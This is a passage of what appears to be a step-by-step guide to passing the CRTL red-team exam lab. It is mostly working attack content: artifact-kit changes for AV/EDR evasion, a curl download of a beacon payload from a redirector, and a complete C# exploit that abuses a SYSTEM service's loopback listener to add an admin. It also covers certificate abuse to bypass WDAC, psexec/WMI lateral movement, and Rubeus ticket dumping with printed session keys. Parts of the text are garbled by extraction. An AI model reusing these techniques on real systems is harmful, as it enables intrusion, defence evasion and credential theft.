Generate syscalls for the artifcat kit just follow the course material and generate all needed file and copy them to artifact kit folder. Now last thing we need to modify is bypass-pipe.c and we need to change the pipe name like so: //sprintf(pipename, "%c%c%c%c%c%c%c%c%cnerokek\\%d", 92, 92, 46, 92, 112, 105, 112, 101, 92, (int)(GetTickCount() % 9898)); sprintf(pipename, "\\%c.%c%c%c%c%c%clegit-%d-pipeu", 0x5c, 0x5c, 112, 105, 112, 101, 0x5c, (int)(GetTickCount() % 9898)); Once that's done you can compile your artifact-kit using the script but remember to comment out the x86 build and add '-masm=intel' to x64 build in order to comp le properly with the syscalls.asm file. Everything is in the RTO2 course material. Here is how successful compilation looks like: Now you need to download your artifact-kit to your attacker machine. Ok but that's not everything because you still need to recompile your sleepmask kit and mimikatz kit. In terms of sleepmask kit you need just do compile it with the script and the same applies to mimikatz kit. No other changes required. Once you do that just download those onto your attacker machine. Now your beacons should be good for bypassing the AV/EDR on the exam InlineExecute-Assembly I know that CRTL exam comes with limited tools but this one BOF will save your life and will let you stress-less on your exam. Infrastructure Preparation You need to f ollow the RT02 course material to setup your redirectors and ssh tunnels for your beacon. Sinee its really straight forward I will only provide you with the .htaccess file for C2 and the default-ssl.con file for apache2. Here is how the .htaccess looks like: #RewriteCond %{HTTP_USER_AGENT} "Windows NT 10.0" [NC] #RewriteRule .* https://localhost:8443/win-payload [P] #RewriteRule ^test$ index.html [NC] Here is the default-ssl.conf: <IfModule mod_ssl.c> <VirtualHost _default_:443> ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined SSLEng ne on SSLProxyEngine on SSLProxyCheckPeerCN off SSLCertificateFile /etc/ssl/certs/public.crt SSLCertificateKeyFile /etc/ssl/private/private.key <FilesMatch "\.(cgi|shtml|phtml|php)$"> SSLOptions +StdEnvVars </FilesMatch> <Directory /usr/lib/cgi-bin> SSLOptions +StdEnvVars </Directory> </VirtualHost> <Directory /var/www/html> Options Indexes FollowSymLinks MultiViews AllowOverride All Require all granted </Directory> </IfModule> (Please remember about generating the public.crt and private.key on teamserver not on redirector and just copy them to your redirectors) If you did everything correctly then you should be fine and you shouldn't have any errors. Just remember when you are hosting a file for download you mus always specify the following with curl: curl -k -A "Legit Agent" https://<ip-redirector>/win-payload/beacon.exe O Welcome.exe WKSTN1 - How to pwn Generate your beacon and download it with curl to wkstn1. Once your beacon is executed you should pay attention to the AV but your beacons will not be killed by it at all. The first thing is enumerating the machine so please enumerate running services on the machine. You will notice a service such as this: C:\Users\consultant>sc qc customsvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: customsvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Custom Service\CustomApp.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : customsvc DEPENDENCIES : SERVICE_START_NAME : LocalSystem This CustomApp.exe is our privilege escalation path. If you know a little bit of RE you can copy this CustomApp to your consultant desktop and upload it to your attacker machine where you can analyse the code using dnspy. Here is the interesting code: namespace CustomApp { // Token: 0x02000003 RID: 3 public class IpcHandler { // Token: 0x06000003 RID: 3 RVA: 0x00002124 File Offset: 0x00000324 public void Start() { this._listener = new TcpListener(IPAddress.Loopback, 6666); this._listener.Start(100); this._running = true; while (this._running) { TcpClient tcpClient = this._listener.AcceptTcpClient(); IpcRequest ipcRequest = tcpClient.ReadData().Deserialize<IpcRequest>(); if (ipcRequest == null || string.IsNullOrWhiteSpace(ipcRequest.Command)) { tcpClient.Close(); return; } IpcHandler.ProcessIpcRequest(ipcRequest); tcpClient.Close(); } } // Token: 0x06000004 RID: 4 RVA: 0x0000219F File Offset: 0x0000039F public void Stop() { this._running = false; this._listener.Stop(); } // Token: 0x06000005 RID: 5 RVA: 0x000021B4 File Offset: 0x000003B4 private static void ProcessIpcRequest(IpcRequest request) { using (Process process = new Process { StartInfo = new ProcessStartInfo { FileName = request.Command, Arguments = request.Arguments, WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true } }) { process.Start(); } } // Token: 0x04000001 RID: 1 private TcpListener _listener; // Token: 0x04000002 RID: 2 private bool _running; } } It starts listener on port 6666 on loopback address. It waits for a json request with the following format: { "args": "/c something", "cmd": "C:\\Windows\\System32\\cmd.exe" } Here is my quick exploit for it which will add consultant to local admins group: using System; using System.Diagnostics; using System.IO; using System.Net; using System.Net.Sockets; using System.Runtime.Serialization; using System.Runtime.Serialization.Json; using System.Text; namespace CustomApp { [DataContract] public class IpcRequest { [DataMember(Name = "cmd")] public string Command { get; set; } [DataMember(Name = "args")] public string Arguments { get; set; } } class Program { static void Main(string[] args) { // Define the server address and port string server = ""; int port = 6666; // Define the command and arguments to send string command = "C:\\windows\\system32\\cmd.exe"; string argsString = "/c net localgroup administrators consultant /add"; // Serialize the command and arguments to a JSON string IpcRequest request = new IpcRequest { Command = command, Arguments = argsString }; MemoryStream stream = new MemoryStream(); DataContractJsonSerializer serializer = new DataContractJsonSerializer(typeof(IpcRequest)); serializer.WriteObject(stream, request); byte[] data = stream.ToArray(); string json = Encoding.UTF8.GetString(d ta); Console.WriteLine("JSON data: " + json); // Connect to the server and send the serialized data try { using (TcpClient client = new TcpClient(server, port)) { using (NetworkStream stream1 = client.GetStream()) { stream1.Write(data, 0, data.Length); Console.WriteLine("Data sent successfully"); byte[] buffer = new byte[1024]; int bytesRead = stream1.Read(buffer, 0, buffer.Length); string response = Encoding.UTF8.GetString(buffer, 0, bytesRead); Console.WriteLine("Response received: {response}"); } } } catch (Exception ex) { Console.WriteLine("Failed to connect to {server} on port {port}: {ex.Message}"); } Console.ReadLine(); // Prevent console window from closing } } } You can compile the following code using the following command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\consultant\Desktop\Program.cs Once compiled and execute you should see the following: Please remember that the changes will not take effect until the machine is rebooted. Otherwise you will have to enter your credentials to UAC prompt each time you try to execute administrative task) Flag1 is on smann desktop. Once you get a beacon running in high integrity mode you can use getsystem command to get SYSTEM token and then list running processes using ps. Once you do that you will notice that user khawkins has two process running one of the powershell which we can either steal_token or inject to in order to run as that user. beacon> getsystem [ ] Tasked beacon to get SYSTEM beacon> ps [*] Tasked beacon to list processes [+] host called home, sent: 2755 bytes [+] Impersonated NT AUTHORITY\SYSTEM [*] Process List PID PPID Name Arch Session User --- ---- ---- ---- ------- ----- 0 0 [System Process] 4 0 System x64 0 NT x64 0 NT x64 0 NT x64 0 NT x64 2 x64 0 NT x64 0 NT x64 0 NT x64 1 NT x64 0 NT x64 1 NT x64 0 NT x64 0 NT AUTHORITY\SYSTEM 8 636 svchost.exe AUTHORITY\SYSTEM 60 636 svchost.exe AUTHORITY\SYSTEM 88 4 Registry AUTHORITY\SYSTEM 96 768 RuntimeBroker.exe RTO2\consultant 320 4 smss.exe AUTHORITY\SYSTEM 344 636 svchost.exe AUTHORITY\NETWORK SERVICE 420 408 csrss.exe AUTHORITY\SYSTEM 496 488 csrss.exe AUTHORITY\SYSTEM 544 408 wininit.exe AUTHORITY\SYSTEM 560 488 winlogon.exe AUTHORITY\SYSTEM 572 636 SgrmBroker.exe AUTHORITY\SYSTEM 636 544 services.exe AUTHORITY\SYSTEM 656 544 lsass.exe x64 0 NT x64 0 NT fontdrvhost.exe x64 0 Font Driver fontdrvhost.exe x64 1 Font Driver svchost.exe x64 0 NT dwm.exe x64 2 Window svchost.exe x64 0 NT x64 1 NT dwm.exe x64 1 Window svchost.exe x64 0 NT x64 0 NT x64 0 NT x64 0 NT x64 0 NT x64 0 NT x64 2 x64 0 NT x64 0 NT x64 0 NT x64 0 NT x64 0 NT AUTHORITY\SYSTEM 768 636 svchost.exe AUTHORITY\SYSTEM 792 544 Host\UMFD-0 800 560 Host\UMFD-1 896 636 AUTHORITY\NETWORK SERVICE 908 2080 Manager\DWM-2 912 636 AUTHORITY\SYSTEM 972 560 LogonUI.exe AUTHORITY\SYSTEM 992 560 Manager\DWM-1 1148 636 AUTHORITY\LOCAL SERVICE 1156 636 svchost.exe AUTHORITY\LOCAL SERVICE 1164 636 svchost.exe AUTHORITY\LOCAL SERVICE 1228 636 svchost.exe AUTHORITY\NETWORK SERVICE 1436 636 svchost.exe AUTHORITY\LOCAL SERVICE 1468 4 Memory Compression AUTHORITY\SYSTEM 1520 344 rdpclip.exe RTO2\consultant 1528 636 svchost.exe AUTHORITY\LOCAL SERVICE 1536 636 svchost.exe AUTHORITY\LOCAL SERVICE 1576 636 svchost.exe AUTHORITY\LOCAL SERVICE 1608 636 svchost.exe AUTHORITY\SYSTEM 1684 636 svchost.exe AUTHORITY\LOCAL SERVICE 1696 636 svchost.exe x64 0 NT x64 0 NT x64 0 NT x64 2 x64 2 x64 2 NT x64 0 NT x64 0 NT x64 0 NT x64 2 x64 0 NT x64 0 NT x64 2 x64 0 x64 2 x64 0 NT fontdrvhost.exe x64 2 Font Driver svchost.exe x64 0 NT x64 0 NT x64 0 NT x86 0 NT x64 2 AUTHORITY\LOCAL SERVICE 1796 768 MoUsoCoreWorker.exe AUTHORITY\SYSTEM 1852 636 spoolsv.exe AUTHORITY\SYSTEM 1884 5636 msedge.exe RTO2\consultant 1940 8 sihost.exe RTO2\consultant 2080 2440 winlogon.exe AUTHORITY\SYSTEM 2192 636 svchost.exe AUTHORITY\SYSTEM 2308 636 CustomApp.exe AUTHORITY\SYSTEM 2372 636 VGAuthService.exe AUTHORITY\SYSTEM 2380 768 TextInputHost.exe RTO2\consultant 2416 768 WmiPrvSE.exe AUTHORITY\SYSTEM 2424 636 MsMpEng.exe AUTHORITY\SYSTEM 2540 768 RuntimeBroker.exe RTO2\consultant 2656 636 uhssvc.exe NT AUTHORITY\SYSTEM 2808 768 Microsoft.Photos.exe RTO2\consultant 2872 3052 conhost.exe AUTHORITY\SYSTEM 2948 2080 Host\UMFD-2 2980 636 AUTHORITY\SYSTEM 3016 636 svchost.exe AUTHORITY\LOCAL SERVICE 3052 8 CompatTelRunner.exe AUTHORITY\SYSTEM 3148 2652 MicrosoftEdgeUpdate.exe AUTHORITY\SYSTEM 3200 5636 msedge.exe RTO2\consultant 3228 4368 Welcome.exe x64 2 x64 2 x64 2 x64 0 x64 2 x64 0 NT x64 2 NT x64 0 NT x64 0 NT x64 0 NT x64 0 NT x64 2 x64 2 x64 2 x64 2 RTO2\consultant 3320 8 taskhostw.exe RTO2\consultant 3356 636 svchost.exe RTO2\consultant 3504 636 WUDFHost.exe NT AUTHORITY\LOCAL SERVICE 3616 768 YourPhone.exe RTO2\consultant 3664 636 NisSrv.exe AUTHORITY\LOCAL SERVICE 3672 2440 csrss.exe AUTHORITY\SYSTEM 3788 636 svchost.exe AUTHORITY\SYSTEM 3896 636 SearchIndexer.exe AUTHORITY\SYSTEM 3904 3052 CompatTelRunner.exe AUTHORITY\SYSTEM 3932 636 svchost.exe AUTHORITY\LOCAL SERVICE 4172 912 ctfmon.exe RTO2\consultant 4320 768 RuntimeBroker.exe RTO2\consultant 4368 4352 explorer.exe RTO2\consultant 4396 768 dllhost.exe RTO2\consultant 4400 8 powershell.exe x64 0 4564 636 svchost.exe x64 2 RTO2\khawkins RTO2\consultant 4584 4400 conhost.exe x64 0 RTO2\khawkins 4636 768 WmiPrvSE.exe x64 0 NT x64 2 x64 2 x64 2 AUTHORITY\NETWORK SERVICE 4912 768 StartMenuExperienceHost.exe RTO2\consultant 4960 768 RuntimeBroker.exe RTO2\consultant 4996 768 RuntimeBroker.exe RTO2\consultant 5100 768 SearchApp.exe x64 2 x64 2 x64 0 x64 2 x64 2 x64 2 x64 2 x64 2 x64 2 x64 2 x64 0 RTO2\consultant 5468 4368 SecurityHealthSystray.exe RTO2\consultant 5496 636 SecurityHealthService.exe NT AUTHORITY\SYSTEM 5540 4368 vm3dservice.exe RTO2\consultant 5636 4368 msedge.exe RTO2\consultant 5780 5636 msedge.exe RTO2\consultant 5912 8 taskhostw.exe RTO2\consultant 5956 5636 msedge.exe RTO2\consultant 5968 5636 msedge exe RTO2\consultant 5992 5636 msedge.exe RTO2\consultant 6096 636 svchost.exe NT AUTHORITY\SYSTEM beacon> inject 4400 x64 smb [*] Tasked beacon to inject windows/beacon_bind_pipe (\\.\pipe\PSHost.133206677787088104.5916.DefaultAppDomain.powershell) into 4400 (x64) [+] host called home, sent: 260209 bytes [+] established link to child beacon: Now we need to use Certify to get a Code Signing Certificate in orde to bypass WDAC on SRV host and other hosts in the domain. You need to be khawkins because he is part of Developers group which can only request this certificate. Here is how: beacon> execute-assembly C:\Tools\Obftools\Certify\YouAreFuckingStupid\bin\Release\YouAreFuckingStupid.exe request /ca:ca.redteamops2.local\sub-ca /template:RTO2CodeSigning Copy the -----BEGIN RSA PRIVATE KEY----- ... -----END CERTIFICATE----- section to a file cert.pem on teamserver. Convert it to pfx file on teamserver using the following command: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx Very Important! Download cert.pfx from teamserver to attacker machine and upload the signtool.exe, cert.pfx and your beacon.exe to WKSTN1 through your beacon. Then use the signtool to sign your beacon for use on SRV host. If you don't do as I said you will break your certificate chain because attacker machine is not domain joined. We can move laterly to SRV like this: beacon> cd \\srv.redteamops2.local\c$\ beacon> upload C:\Payloads\beacon-signed.exe beacon> remote-exec wmi SRV cmd.exe /c "C:\beacon-svc.exe" beacon> link SRV <pipe> Once we are on the SRV host we can grab the flag2 from Administrator desktop. SRV Once we are on srv we need to first get new beacon running as SYSTEM either through getsystem or inject. Once we are running as system you will need to execute Rubeus to view the tickets. I recommend signing Rubeus with cert.pfx and uploading it to the target and then executing it from disk. If AV is still a problem after you obfuscate your Rubeus you can just disable it with powershell. Now lets run Rubeus: beacon> run GloryAndVictoryToMerlin.exe triage [*] Tasked beacon to run: GloryAndVictoryToMerlin.exe triage [+] host called home, sent: 52 bytes [+] received output: ______ \r _ (_____ \ | | _____) )_ _| |__ | __ /| | | | _____ _ _ ___ _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/\r v2.0.3 \r \rAction: Triage Kerberos Tickets (All Users)\r [*] Current LUID : 0x3e7 -------------------------------------------------------------------------------------------------------------- | LUID | UserName | EndTime | Service | -------------------------------------------------------------------------------------------------------------| 0xdad63 | smann @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL | 2/26/2023 6:24:32 PM | | 0xd0a98 | khawkins @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL | 2/26/2023 6:36:07 PM | | 0x946d8 | khawkins @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL | 2/26/2023 6:36:07 PM | | 0x3e4 | srv$ @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL | 2/26/2023 6:24:14 PM | | 0x3e4 | srv$ @ REDTEAMOPS2.LOCAL | ldap/dc.redteamops2.local/redteamops2.local | 2/26/2023 6:24:14 PM | | 0x3e4 | srv$ @ REDTEAMOPS2.LOCAL | ldap/dc.redteamops2.local | 2/26/2023 6:24:14 PM | | 0x3e4 | srv$ @ REDTEAMOPS2.LOCAL | cifs/dc.redteamops2.local | 2/26/2023 6:24:14 PM | | 0x3e7 | srv$ @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL | 2/26/2023 6:45:00 PM | | 0x3e7 | srv$ @ REDTEAMOPS2.LOCAL | cifs/dc | 2/26/2023 6:45:00 PM | | 0x3e7 | srv$ @ REDTEAMOPS2.LOCAL | cifs/dc.redteamops2.local/redteamops2.local | 2/26/2023 6:45:00 PM | | 0x3e7 | srv$ @ REDTEAMOPS2.LOCAL | ldap/dc.redteamops2.local | 2/26/2023 6:45:00 PM | | 0x3e7 | srv$ @ REDTEAMOPS2.LOCAL | SRV$ | 2/26/2023 6:45:00 PM | | 0x3e7 | srv$ @ REDTEAMOPS2.LOCAL | LDAP/dc.redteamops2.local/redteamops2.local | 2/26/2023 6:45 00 PM | -------------------------------------------------------------------------------------------------------------- Now we need to dump the ticket: beacon> run GloryAndVictoryToMerlin.exe dump /luid:0xdad63 /nowrap [*] Tasked beacon to run: GloryAndVictoryToMerlin.exe dump /luid:0xdad63 /nowrap [+] host called home, sent: 72 bytes [+] received output: \r ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/\r v2.0.3 \r \rAction: Dump Kerberos Ticket Data (All Users)\r [*] Target LUID : 0xdad63 [*] Current LUID : 0x3e7 UserName : smann Domain : RTO2 LogonId : 0xdad63 UserSID : S-1-5-21-579679643-2453578207-2968119456- 1110 AuthenticationPackage : Kerberos LogonType : Network LogonTime : 2/26/2023 9:49:42 AM LogonServer : LogonServerDNSDomain : REDTEAMOPS2.LOCAL UserPrincipalName : ServiceName : krbtgt/REDTEAMOPS2.LOCAL ServiceRealm : REDTEAMOPS2.LOCAL UserName : smann UserRealm : REDTEAMOPS2.LOCAL StartTime : 2/26/2023 8:25:02 AM EndTime : 2/26/2023 6:24:32 PM RenewTill : 3/5/2023 8:24:32 AM Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable KeyType : Base64(key) : aes256_cts_hmac_sha1 zY37uKr0MZZfPwLWSAJJ33ExJNb2V1BTq2k8hvuEKlE= Base64EncodedTicket : <base64ticket> Now lets spawn a process for steal_token: beacon> run GloryAndVictoryToMerlin.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:RTO2 /username:smann /password:FakePass /ticket:<base64ticket> [+] host called home, sent: 2125 bytes [+] received output: \r ______ _ (_____ \ | | _____) )_ _| |__ | __ /| | | | _____ _ _ ___ _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/\r v2.0.3 \r \r[*] Action: Create Process (/netonly)\r \r[*] Using RTO2\smann:FakePass\r [*] Showing process : False [*] Username : smann [*] Domain : RTO2 [*] Password : FakePass [+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9 [+] ProcessID : 3360 [+] Ticket successfully imported! [+] LUID : 0xe7ce1 beacon> steal_token 3360 [*] Tasked beacon to steal token from PID 3360 [+] host called home, sent: 12 bytes [+] Impersonated NT AUTHORITY\SYSTEM beacon> ls \\wkstn2.redteamops2.local\c$ [*] Tasked beacon to list files in \\wkstn2.redteam ps2.local\c$ [+] host called home, sent: 47 bytes [*] Listing: \\wkstn2.redteamops2.local\c$\ Size Type Last Modified Name ---- ---- ------------- ---- dir 06/06/2022 11:38:01 $Recycle.Bin dir 06/06/2022 13:29:25 $WinREAgent dir 01/27/2022 18:18:49 Documents and Settings dir 12/07/2019 09:14:52 PerfLogs dir 06/16/2022 13:43:02 Program Files dir 10/06/2021 13:57:25 Program Files (x86) dir 09/21/2022 12:02:16 ProgramData dir 06/08/2022 08:43:18 Recovery dir 01/27/2022 18:19:18 System Volume Information dir 09/21/2022 12:01:14 Users dir 06/06/2022 14:37:15 Windows 8kb fil 02/26/2023 08:23:43 DumpStack.log.tmp 796mb fil 02/26/2023 08:23:43 hiberfil.sys 832mb fil 02/26/2023 08:23:43 pagefile.sys 16mb fil 02/26/2023 08:23:43 swapfile.sys beacon> ls \\wkstn2.redteamops2.local\c$\users\lmurray\Desktop [*] Tasked beacon to list files in \\wkstn2.redteamops2.local\c$\users\lmurray\Desktop [+] host called home, sent: 69 bytes [*] Listing: \\wkstn2.redteamops2.local\c$\users\lmurray\Desktop\ Size Type Last Modified Name ---- -- - ------------- ---- 282b f l 06/06/2022 11:37:38 desktop.ini 70b fil 02/23/2023 20:05:56 flag3.txt beacon> download \\wkstn2.redteamops2.local\c$\users\lmurray\Desktop\flag3.txt [*] Tasked beacon to download \\wkstn2.redteamops2.local\c$\users\lmurray\Desktop\flag3.txt [+] host called home, sent: 69 bytes [*] started download of \\wkstn2.redteamops2.local\c$\users\lmurray\Desktop\flag3.txt (70 bytes) [*] download of flag3.txt is complete To get a beacon you can just do the following: cd \\wkstn2.redteamops2.local\c$\ upload c:\Payloads\beacon-signed.exe beacon> remote-exec psexec WKSTN2 cmd.exe /c "C:\beacon-signed.exe" [*] Tasked beacon to run 'cmd.exe /c "C:\beacon-svc.exe"' on WKSTN2 via Service Control Manager [+] host called home, sent: 2015 bytes [+] received output: Started service 4845abe on WKSTN2 beacon> link WKSTN2 PSHost.133206677787088104.5916.DefaultAppDomain.powershell [*] Tasked to link to \\WKSTN2\pipe\PSHost.133206677787088104.5916.DefaultAppDomain.powershell [+] host called home, sent: 81 bytes [+] established link to child beacon: Now using Rubeus dump the tickets. This rubeus must be signed with cert.pfx otherwise you will get an error: beacon> inlineExecute-Assembly --dotnetassembly C:\Tools\Loot\ObfRubeus.exe --assemblyargs triage --amsi --etw [*] Running inlineExecute-Assembly by (@anthemtotheego) [+] host called home, sent: 594728 bytes [+] received output: ______ \r _ (_____ \ | | _____) ) _| |__ | __ /| | | | _____ _ _ ___ _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/| ___/|_____)____/(___/\r v2.0.3 \r \rAction: Triage Kerberos Tickets (All Users)\r [*] Current LUID : 0x3e7 -------------------------------------------------------------------------------------------------------------| LUID | EndTime | UserName | Service | ---------------------------------------- -- --------------------------- --------------------------------------| 0x1e5839 | smann @ REDTEAMOPS2.LOCAL | cifs/WKSTN2 | 2/26/2023 6:24:32 PM | | 0x1d868c | smann @ REDTEAMOPS2.LOCAL | cifs/wkstn2.redteamops2.local | 2/26/2023 6:24:32 PM | | 0x3938f | lmurray @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL | 2/26/2023 6:24:32 PM | | 0x3938f | lmurray @ REDTEAMOPS2.LOCAL | LDAP/dc.redteamops2.local/redteamops2.local | 2/26/2023 6:24:32 PM | | 0x3917f | lmurray @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL | 2/26/2023 6:24:32 PM | | 0x3917f | lmurray @ REDTEAMOPS2.LOCAL | LDAP/dc.redteamops2.local/redteamops2.local | 2/26/2023 6:24:32 PM | | 0x3e4 | wkstn2$ @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL | 2/26/2023 6:24:18 PM | | 0x3e4 | wkstn2$ @ REDTEAMOPS2.LOCAL | GC/dc.redteamops2.local/redteamops2.local | 0x3e4 | 2/26/2023 6:24:18 PM | | wkstn2$ @ REDTEAMOPS2.LOCAL | cifs/dc.redteamops2.local | 2/26/2023 6:24:18 PM | | 0x3e4 | wkstn2$ @ REDTEAMOPS2.LOCAL | ldap/dc.redteamops2.local/redteamops2.local | 2/26/2023 6:24:18 PM | | 0x3e7 | wkstn2$ @ REDTEAMOPS2.LOCAL | krbtgt/REDTEAMOPS2.LOCAL | 2/26/2023 6:24:18 PM | | 0x3e7 | wkstn2$ @ REDTEAMOPS2.LOCAL | cifs/dc.redteamops2.local/redteamops2.local | 2/26/2023 6:24:18 PM | | 0x3e7 | wkstn2$ @ REDTEAMOPS2.LOCAL | WKSTN2$ | 2/26/2023 6:24:18 PM | | 0x3e7 | wkstn2$ @ REDTEAMOPS2.LOCAL | LDAP/dc.redteamops2.local | 2/26/2023 6:24:18 PM | | 0x3e7 | wkstn2$ @ REDTEAMOPS2.LOCAL | LDAP/dc redteamops2.local/redteamops2.local | 2/26/2023 6:24:18 PM | -------------------------------------------------------------------------------------------------------------- [+] received output: [+] inlineExecute-Assembly Finished beacon> inlineExecute-Assembly --dotnetassembly C:\Tools\Loot\GloryAndVictoryToMerlin.exe --assemblyargs dump /luid:0x3938f /nowrap --amsi --etw [*] Running inlineExecute-Assembly by (@anthemtotheego) [+] host called home, sent: 594748 bytes [+] received output: \r ______ _ (_____ \ | | _____) )_ _| |__ | __ /| | | | _____ _ _ ___ _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/\r v2.0.3 \r \rAction: Dump Kerberos Ticket Data (All Users)\r [*] Target LUID : 0x3938f [*] Current LUID : 0x3e7 UserName : lmurray Domain : RTO2 LogonId : 0x3938f UserSID : S-1-5-21-579679643-2453578207-2968119456- 1105 AuthenticationPackage : Kerberos LogonType : Interactive LogonTime : 2/26/2023 8:24:31 AM LogonServer : DC LogonServerDNSDomain : REDTEAMOPS2.LOCAL UserPrincipalName : lmurray@redteamops2.local ServiceName : krbtgt/REDTEAMOPS2.LOCAL ServiceRealm : REDTEAMOPS2.LOCAL UserName : lmurray UserRealm : REDTEAMOPS2.LOCAL StartTime : 2/26/2023 8:24:32 AM EndTime : 2/26/2023 6:24:32 PM RenewTill : 3/5/2023 8:24:32 AM Flags : name_canonicalize, pre_authent, initial, KeyType : aes256_cts_hmac_sha1 Base64(key) : renewable, forwardable TITM9RmcVagiksxO263OBTsmOZuneWL1cFGiEpYEb6Y= Base64EncodedTicket : <base64ticket> beacon> inlineExecute-Assembly --dotnetassembly C:\Tools\Loot\GloryAndVictoryToMerlin.exe --assemblyargs createnetonly /program:C:\Windows\System32\cmd.exe /domain:RTO2 /username:lmurray /password:FakePass /ticket:<base64ticket> [+] received output: ______ \r _ (_____ \ | | _____) )_ _| |__ | __ /| | | | _____ _ _ ___ _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/\r v2.0.3 \r \r[*] Action: Create Process (/netonly)\r \r[*] Using RTO2\lmurray:FakePass\r [*] Showing process : False [*] Username : lmurray [*] Domain : RTO2 [*] Password : FakePass [+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9 [+] ProcessID : 5080 [+] Ticket successfully imported! [+] LUID : 0x1f19d8 [+] received output: [+] inlineExecute-Assembly Finished beacon> steal_token 5080 beacon> ls \\dc.redteamops2.local\C$ [*] Tasked beacon to l st files in \\dc.redteamops2.local\C$ [+] host called home, sent: 43 bytes [*] Listing: \\dc.redteamops2.local\C$\ Size Type Last Modified Name ---- ---- ------------- ---- dir 06/06/2022 11:19:59 $Recycle.Bin dir 05/11/2022 04:41:38 $WinREAgent dir 05/25/2022 05:27:11 Boot dir 08/19/2021 00:34:55 Documents and Settings dir 08/19/2021 07:24:49 EFI dir 05/08/2021 09:20:24 PerfLogs dir 06/06/2022 15:49:50 Program Files dir 05/11/2022 03:56:12 Program Files (x86) dir 09/21/2022 12:59:59 ProgramData dir 06/06/2022 10:59:03 Recovery dir 06/06/2022 11:30:53 System Volume Information dir 06/06/2022 11:00:20 Users dir 06/06/2022 11:33:48 Windows 427kb fil 05/25/2022 05:24:05 bootmgr 1b fil 05/08/2021 09:14:33 BOOTNXT 12kb fil 02/26/2023 08:22:53 DumpStack.log.tmp 384mb fil 02/26/2023 08:22:53 pagefile.sys beacon> ls \\dc.redteamops2.local\C$\Users\Administrator\Desktop [*] Tasked beacon to list files in . [+] host called home, sent: 34 bytes [*] Listing: \\dc.redteamops2.local\C$\Users\Administrator\Desktop\ Size Type Last Modified Name ---- ---- ------------- ---- 282b fil 06/06/2022 11:19:46 desktop.ini 70b fil 02/23/2023 20:31:50 flag4.txt beacon> upload C:\Payloads\beacon-signed.exe [*] Tasked beacon to upload C:\Payloads\beacon-signed as beaconsigned.exe [+] host called home, sent: 450938 bytes beacon> remote-exec psexec DC cmd.exe /c "C:\beacon-signed.exe" [*] Tasked beacon to run 'cmd.exe /c "C:\beacon-signed.exe"' on DC via Service Control Manager [+] host called home, sent: 2039 bytes [+] received output: Started service 35bf9d8 on DC beacon> link DC PSHost.133206677787088104.5916.DefaultAppDomain.powershell [*] Tasked to link to \\DC\pipe\PSHost.133206677787088104.5916.DefaultAppDomain.powershell [+] host called home, sent: 77 bytes [+] established link to child beacon: